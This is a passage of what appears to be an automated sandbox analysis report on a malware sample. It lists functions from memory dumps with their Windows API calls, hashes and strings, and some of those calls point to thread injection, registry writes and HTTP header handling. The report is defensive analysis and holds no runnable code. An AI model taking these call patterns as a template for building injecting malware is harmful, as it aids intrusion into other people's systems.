  • memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
  • RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
  • lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B34B73, Relevance: 7.6, APIs: 5, Instructions: 59 Total matches: 218stringthreadtime
Similarity
  • Total matches: 218
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
  • String ID:
  • API String ID: 1809591024-0
  • Opcode ID: a7ba591b065612ca5392502f724a25a23db9ce2fa7cff4761a80896cec28b3f4
  • Instruction ID: 66f2c6aac88ed1bd9334c7600f51663f9dc178801934e8592d4354f33624fdca
  • Opcode Fuzzy Hash: 51D05B95471CC4D3595E459D102515290C66C6530619CF5467751397655B30305CEF6D
  • Instruction Fuzzy Hash: 66f2c6aac88ed1bd9334c7600f51663f9dc178801934e8592d4354f33624fdca
APIs
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • GetCurrentThreadId.KERNEL32(?,?,?,01B34C06,?,01B374BC,00000000,01B32D09,00000750), ref: 01B34BAB
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,01B34C06,?,01B374BC,00000000,01B32D09,00000750), ref: 01B34BB7
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 01B34BC5
  • PathFindExtensionA.SHLWAPI(00000000), ref: 01B34BD9
  • lstrcpy.KERNEL32(00000000), ref: 01B34BE0
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001CA73F, Relevance: 7.6, APIs: 5, Instructions: 55 Total matches: 50memoryregistry
Similarity
  • Total matches: 50
  • API ID: HeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapwsprintf
  • String ID:
  • API String ID: 3256001470-0
  • Opcode ID: 01f8e3d33e50ea4ec22d448b9311bf29d95033bd0f3209c1f4217f579a1e53db
  • Instruction ID: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
  • Opcode Fuzzy Hash: 40E0C2FA0244E39A502B6469683A2B8F6197C912D640D6232F6152D609BF8332A73B1E
  • Instruction Fuzzy Hash: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
APIs
  • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
  • wsprintfA.USER32 ref: 001CA775
  • RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
  • RegCloseKey.ADVAPI32(?), ref: 001CA7B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D81E6, Relevance: 7.5, APIs: 5, Instructions: 35 Total matches: 108
Similarity
  • Total matches: 108
  • API ID: CreateEventGetCurrentProcessIdGetLastErrorGetVersionOpenProcess
  • String ID:
  • API String ID: 2618137798-0
  • Opcode ID: 1fac3af1d3adb9373cb89c72372644e4dde4d88d2c69072dbd9dfbcd659d169c
  • Instruction ID: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
  • Opcode Fuzzy Hash: 97D05E300CD904CB900F7861444435C5E49FD873C289C3A45F84020D0EEBC4E2E03F99
  • Instruction Fuzzy Hash: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,001C138B,?), ref: 001D81EE
  • GetVersion.KERNEL32 ref: 001D81FD
  • GetCurrentProcessId.KERNEL32 ref: 001D8214
  • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 001D8231
  • GetLastError.KERNEL32 ref: 001D8250
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1473, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61 Total matches: 61memory
Similarity
  • Total matches: 61
  • API ID: HeapFreeRtlAllocateHeapwsprintf
  • String ID: | "%s" | %u
  • API String ID: 2081543798-1108170107
  • Opcode ID: ae5a1f8a578234636b2fd743cdac99d3783860d35e2b0785ba9b52f3117a28dd
  • Instruction ID: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
  • Opcode Fuzzy Hash: 67E07DB409184355B037ACD69025B7EC3427D810CCC8C7A7AEA023520E6E03306727CD
  • Instruction Fuzzy Hash: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C14AA
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • wsprintfA.USER32 ref: 001C14CD
    • Part of subcall function 001CB83A: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,001C14F5,?,00000000,00000000,00000000,00000006), ref: 001CB858
    • Part of subcall function 001CB83A: wsprintfA.USER32 ref: 001CB876
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C14FE
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D74F7, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 57 Total matches: 53
Similarity
  • Total matches: 53
  • API ID: CreateDirectoryGetTempFileNameGetTickCount
  • String ID: \Low
  • API String ID: 1806217356-4112222293
  • Opcode ID: 7a122810f4ba2df995a7e36e2785305a4afbcd989035409fc777345f7c9fec3f
  • Instruction ID: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
  • Opcode Fuzzy Hash: 49D0C2B9A24C468A8D56A268450A7718F61A251BD7BCC6034D7059B882E709B9CA1F12
  • Instruction Fuzzy Hash: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D7543
  • GetTickCount.KERNEL32(00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D754E
  • GetTempFileNameA.KERNEL32(00000000,00000000,00000000), ref: 001D755A
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CA6B0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55 Total matches: 58memory
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeapmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 1636659435-3194369251
  • Opcode ID: a76e7bf81e614bf17f8f08eebcaf72a4e27078f9184a1b73ad63f98f5b0f8fb9
  • Instruction ID: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
  • Opcode Fuzzy Hash: 8AD0CD20050C91CEC927315268357A5E945BF82187C4D9173DA40342670F123161699F
  • Instruction Fuzzy Hash: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32(?,00000016,00000000,00000000,00000004,?,00000002,?,00000016,00000000,00000000,00000004,?,?,20000013,00000000), ref: 001DEC80
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32 ref: 001DEC9A
  • memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
  • HeapFree.KERNEL32(00000000,?), ref: 001CA727
Strings
  • Access-Control-Allow-Origin:, xrefs: 001CA6B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3ACC, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53 Total matches: 59memorystring
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrlen
  • String ID: EMPTY
  • API String ID: 1247231264-2677276532
  • Opcode ID: 2051cc3ec5f54dabcc304b4f0cec6452e119b3d666e1d12c395dfd06a3d839d2
  • Instruction ID: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
  • Opcode Fuzzy Hash: 8DD02B3086545F8FC0275440A4383E9D84477050D9D5D1535E4402A0485B0732811FA9
  • Instruction Fuzzy Hash: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
  • lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL ref: 001DDEA1
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,001EC117), ref: 001DDF4F
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDFC7
    • Part of subcall function 001DDE6F: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DE039
    • Part of subcall function 001DDE6F: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE061
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,?), ref: 001DE06F
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,00000000), ref: 001DE07F
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE12C
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,001EB1C0), ref: 001DE176
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DE185
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE197
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000), ref: 001DE1AD
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?), ref: 001DE1BC
  • HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CE37D, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 44 Total matches: 70
Similarity
  • Total matches: 70
  • API ID: GetModuleHandleGetTickCountwsprintf
  • String ID: {%08X-%04X-%04X-%04X-%08X%04X}
  • API String ID: 1324421646-3263720277
  • Opcode ID: d940d29fd7f5330e7f547d121f366808a2e82348162453c5dafed4dbd97d3afc
  • Instruction ID: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
  • Opcode Fuzzy Hash: 0FD05E78198713E62323F4540205D39B124A4A25E348E73A5C81072598BB96B74A6B33
  • Instruction Fuzzy Hash: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
APIs
Strings
  • {%08X-%04X-%04X-%04X-%08X%04X}, xrefs: 001CE3C7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CC42B, Relevance: 6.3, APIs: 3, Strings: 1, Instructions: 262 Total matches: 55memorystring
Similarity
  • Total matches: 55
  • API ID: HeapFreelstrlenmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 3630223450-3194369251
  • Opcode ID: 6d2db76437dee989d9fadb858985fbdf1fd5b378b7da2dc10109644ce662e43c
  • Instruction ID: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
  • Opcode Fuzzy Hash: 65311E325646C0A6DC2560A24462B54E88037129E6ECC5319E366796F70F42E34FFF1E
  • Instruction Fuzzy Hash: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
APIs
  • memcpy.NTDLL(?,001ECCF4,0000001A,00000000,?,00000000,001CCA48,?,00000000), ref: 001CC4DA
  • lstrlen.KERNEL32(00000008,00000000), ref: 001CC6E5
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CC25A: WaitForSingleObject.KERNEL32(000001F4), ref: 001CC2E0
  • HeapFree.KERNEL32(00000000,00000008,?), ref: 001CC693
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
    • Part of subcall function 001CA6B0: RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001CA6B0: memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
    • Part of subcall function 001CA6B0: HeapFree.KERNEL32(00000000,?), ref: 001CA727
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
    • Part of subcall function 001C7FA5: memmove.NTDLL(00000000,00000000,00000000,?,00000000,001CAA69,001EC504,00000000,00000000,-00000039,?,?,001CABDF,?,00000000,?), ref: 001C7FEB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DF4FD, Relevance: 6.2, APIs: 4, Instructions: 192 Total matches: 92string
Similarity
  • Total matches: 92
  • API ID: FreeLibraryGetLastErrorlstrlenmbstowcs
  • String ID:
  • API String ID: 3965213930-0
  • Opcode ID: 33e50c761254206a7693bc56ddd8fe5740e00c9b2afd6d060e954be887c38ac1
  • Instruction ID: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
  • Opcode Fuzzy Hash: 8011594A088E90A7C53360400993BD5E156E791DD6D8E73B36AE424ADA8E41B34F6F03
  • Instruction Fuzzy Hash: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
APIs
    • Part of subcall function 001DF422: RegOpenKeyA.ADVAPI32(80000002,001E74AC,00000001), ref: 001DF43D
    • Part of subcall function 001DF422: LoadLibraryA.KERNEL32(00000000), ref: 001DF48B
    • Part of subcall function 001DF422: GetProcAddress.KERNEL32(00000000,001ED2EE), ref: 001DF49D
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4BC
    • Part of subcall function 001DF422: FreeLibrary.KERNEL32(00000000), ref: 001DF4CE
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4D6
    • Part of subcall function 001DF422: RegCloseKey.ADVAPI32(?), ref: 001DF4EE
  • lstrlen.KERNEL32(00000001,00000008,00000000), ref: 001DF618
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001DF636
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DF68B
  • FreeLibrary.KERNEL32(?,?,00000001), ref: 001DF6F3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DC212, Relevance: 6.1, APIs: 4, Instructions: 108 Total matches: 388threadsynchronizationinjection
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 52d5ac88bbbf53c9cfbe25b5062edfbbaef7bf8270021e4a65f9659b5eb139f2
  • Instruction ID: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
  • Opcode Fuzzy Hash: 97014507296660C3D102A815855973AF583E742EBAE28E600DA81B008A4E9539F0EB6D
  • Instruction Fuzzy Hash: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
APIs
  • memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC097: memset.NTDLL ref: 001DC0D3
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
  • SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DE3AA, Relevance: 6.1, APIs: 4, Instructions: 104 Total matches: 59stringtime
Similarity
  • Total matches: 59
  • API ID: memcpy$GetSystemTimeAsFileTimelstrlen
  • String ID:
  • API String ID: 1931430322-0
  • Opcode ID: 693e72703b4a898abaf84b83207713b059777c08181f4929022bd8422aa13c29
  • Instruction ID: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
  • Opcode Fuzzy Hash: DAF08162280C9557ED332454000FF6E1756F662081E8D7733CEF3683A759115254F797
  • Instruction Fuzzy Hash: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?,00000008,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,001DE961), ref: 001DE3C0
  • lstrlen.KERNEL32(?), ref: 001DE3F0
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,?,?), ref: 001DE45F
  • memcpy.NTDLL(00000008,001E53C8,00000002,00000000,?,?), ref: 001DE474
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7E94, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 97 Total matches: 56memory
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpymemset
  • String ID: chun
  • API String ID: 1623351483-3058818181
  • Opcode ID: b1cb9c83363d1f5f3482edc3613e0487e364ca7cf0dd43c793242431dbb67071
  • Instruction ID: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
  • Opcode Fuzzy Hash: 1BF081A5584A42C8F8FA3044C1B657556D27F82A9884C7A07C947203BB65C3B7D73F5D
  • Instruction Fuzzy Hash: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
APIs
  • memset.NTDLL ref: 001C7ED0
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
  • memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D892D, Relevance: 6.1, APIs: 4, Instructions: 93 Total matches: 207
Similarity
  • Total matches: 207
  • API ID: GetLastErrorRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 3795092134-0
  • Opcode ID: 9c0483735e420b961606bb44f790258f0624431ad703bd6a52c8d6e915669058
  • Instruction ID: 6c58acee08f53c06707d3df08afd3539b760a59a5b54298cf15ee4468104f17e
  • Opcode Fuzzy Hash: 3DF0AC400B9F91EBE45376440492F59A247BB01FB6E0EE721A9F211BC23F02625D9B1A
  • Instruction Fuzzy Hash: 6c58acee08f53c06707d3df08afd3539b760a59a5b54298cf15ee4468104f17e
APIs
  • memset.NTDLL ref: 001D894F
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 001D8A42
    • Part of subcall function 001D9142: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D917A
    • Part of subcall function 001D9142: SetLastError.KERNEL32(00000000), ref: 001D9181
    • Part of subcall function 001D909F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D90B7
  • memcpy.NTDLL(00000218,001E3E62,00000100,?,00010003,00083097,?,00000318,00000008), ref: 001D89CA
    • Part of subcall function 001D9101: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D912E
    • Part of subcall function 001D9101: SetLastError.KERNEL32(00000000,?,001D8A05,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 001D9135
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001D8A24
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CE0EE, Relevance: 6.1, APIs: 4, Instructions: 75 Total matches: 60
Similarity
  • Total matches: 60
  • API ID: GetLastError$RtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 3867703424-0
  • Opcode ID: fbdca7628cbe78cbc3b7d70cd058564445f685c77becf59faaf0370b25f97c7a
  • Instruction ID: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
  • Opcode Fuzzy Hash: 66E0E56338CAC1DB174A70D01AF6A96EC88F8D529254F2F20D418597071E81717F9A1B
  • Instruction Fuzzy Hash: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CE104
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CE11F
  • GetLastError.KERNEL32 ref: 001CE18D
    • Part of subcall function 001CDFE8: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001CE066
    • Part of subcall function 001CDFE8: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CE096
    • Part of subcall function 001CDFE8: memcpy.NTDLL(00000000,?,?), ref: 001CE0A7
  • GetLastError.KERNEL32 ref: 001CE19C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7262, Relevance: 6.1, APIs: 4, Instructions: 75 Total matches: 95string
Similarity
  • Total matches: 95
  • API ID: CloseHandleOpenFileMappinglstrlenmemset
  • String ID:
  • API String ID: 686913658-0
  • Opcode ID: c2b4898062c1065ed0612e860c2cb0de06a6071118fdcd99c43ffcca291be294
  • Instruction ID: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
  • Opcode Fuzzy Hash: 0DF05C570219CDC7C4221114D800B11B5257B76C6ACEC9399FCA014D948E0A31A9BE0B
  • Instruction Fuzzy Hash: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
APIs
  • memset.NTDLL ref: 001C7284
    • Part of subcall function 001CBCD2: CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
    • Part of subcall function 001CBCD2: GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
    • Part of subcall function 001CBCD2: WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
    • Part of subcall function 001CBCD2: WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
  • lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 001C72C8
  • OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 001C730E
  • CloseHandle.KERNEL32(?), ref: 001C7331
    • Part of subcall function 001C7341: GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
    • Part of subcall function 001C7341: CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
    • Part of subcall function 001C7341: GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
    • Part of subcall function 001C7341: CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
    • Part of subcall function 001C7341: lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
    • Part of subcall function 001C7341: lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
    • Part of subcall function 001C7341: HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
    • Part of subcall function 001C7341: CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B33F3A, Relevance: 6.1, APIs: 4, Instructions: 75 Total matches: 114
Similarity
  • Total matches: 114
  • API ID: CloseHandleGetSidSubAuthorityGetSidSubAuthorityCountOpenProcessToken
  • String ID:
  • API String ID: 3243309207-0
  • Opcode ID: daf6b00ae99c80d22f011dd47a129de89f1e33b4c2e36c8a2c33b66dba590708
  • Instruction ID: b78d02c5baa715c8e8538e39e195cedf048cde2c72120d51ace7b5a65273c297
  • Opcode Fuzzy Hash: 45E02B814FCFC2D7AB5F2404059175270E6EF60E05C9D9B647520BA5665E3031257E9B
  • Instruction Fuzzy Hash: b78d02c5baa715c8e8538e39e195cedf048cde2c72120d51ace7b5a65273c297
APIs
  • OpenProcessToken.ADVAPI32(000000FF,00020008,01B37494,00000000), ref: 01B33F6C
  • CloseHandle.KERNEL32(01B37494), ref: 01B33FEC
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 01B33FC7
  • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 01B33FD7
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001C7664, Relevance: 6.1, APIs: 4, Instructions: 74 Total matches: 40memory
Similarity
  • Total matches: 40
  • API ID: HeapFree$GetLastErrorRtlAllocateHeap
  • String ID:
  • API String ID: 692199287-0
  • Opcode ID: 4904fb8dbc2e953e77b98dbe9d3f55cb9d56c3531de4b3fdb52f823351afa574
  • Instruction ID: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
  • Opcode Fuzzy Hash: C2E0D8351D48C3E3812714E9D064BFEE500AB805C0E0D26ABBD847D20C9D127076E7C6
  • Instruction Fuzzy Hash: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
  • GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
  • HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B31395, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71 Total matches: 21memory
Similarity
  • Total matches: 21
  • API ID: GetLastErrorHeapFreememset
  • String ID: D
  • API String ID: 2843147199-2746444292
  • Opcode ID: 7d6f6f6309830c53eb87eb1248ac9b1ade3661ad178ea1527cba377d544f1ce2
